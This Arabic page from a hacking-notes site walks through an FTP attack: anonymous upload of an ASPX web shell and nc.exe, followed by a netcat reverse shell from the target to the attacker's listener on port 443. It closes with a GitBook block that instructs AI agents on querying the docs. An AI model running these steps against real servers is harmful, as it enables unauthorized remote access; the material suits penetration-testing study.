> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/ports-and-services/ftp-21/ftp-reverse-shell-webshell-attack.md).

# FTP - هجوم الصدفة العكسية وصدفة الويب

## **شل عكسي عبر رفع FTP**

### **ارفع شل ويب ASPX**

استخدم شل ويب موجودًا، **`cmd.aspx`**، من SecLists:

```bash
locate cmd.aspx
cp /usr/share/davtest/backdoors/aspx_cmd.aspx .
```

ارفعه إلى خادم FTP:

```bash
ftp 10.10.10.5
anonymous
put aspx_cmd.aspx
```

ادخل إلى شل الويب عبر خادم HTTP ونفّذ الأوامر، على سبيل المثال:

```bash
ipconfig
```

<figure><img src="/files/1bcb0e5b7cbae70bdff06307ced9c42c3820fabc" alt=""><figcaption></figcaption></figure>

### **ارفع `nc.exe` الملف الثنائي لغلاف عكسي**

تنزيل **`nc.exe`** من SecLists:

```bash
locate nc.exe 
cp /usr/share/SecLists/Web-Shells/FuzzDB/nc.exe .
```

ارفعه إلى خادم FTP:

```bash
ftp 10.10.10.5
anonymous
put nc.exe
```

من شل الويب، حدّد موقع **`nc.exe`** على الخادم المستهدف:

```powershell
dir /s C:/nc.exe
```

### **قم بإعداد الشل العكسي**

<figure><img src="/files/3299dd75fcf86cc64edbf4a848dd45a484cc933f" alt=""><figcaption></figcaption></figure>

**استمع على المنفذ 443:**

قم بإعداد `nc` مستمع على المنفذ 443:

```bash
rlwrap nc -nvlp 443
```

من الجهاز المستهدف، نفّذ الأمر التالي عبر شل الويب:

```powershell
C:/inetpub/wwwroot/nc.exe -e cmd 10.10.14.26 443
```

<figure><img src="/files/e52b1ed7b24ec256037ef3fc6dff3bfe0fae3b91" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/ports-and-services/ftp-21/ftp-reverse-shell-webshell-attack.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
